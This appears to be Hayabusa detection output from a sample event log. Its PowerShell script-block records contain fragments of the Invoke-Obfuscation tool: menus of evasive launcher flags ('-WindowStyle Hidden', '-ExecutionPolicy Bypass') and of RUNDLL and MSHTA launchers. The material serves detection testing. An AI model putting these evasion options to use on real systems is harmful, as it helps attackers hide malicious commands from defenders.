23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
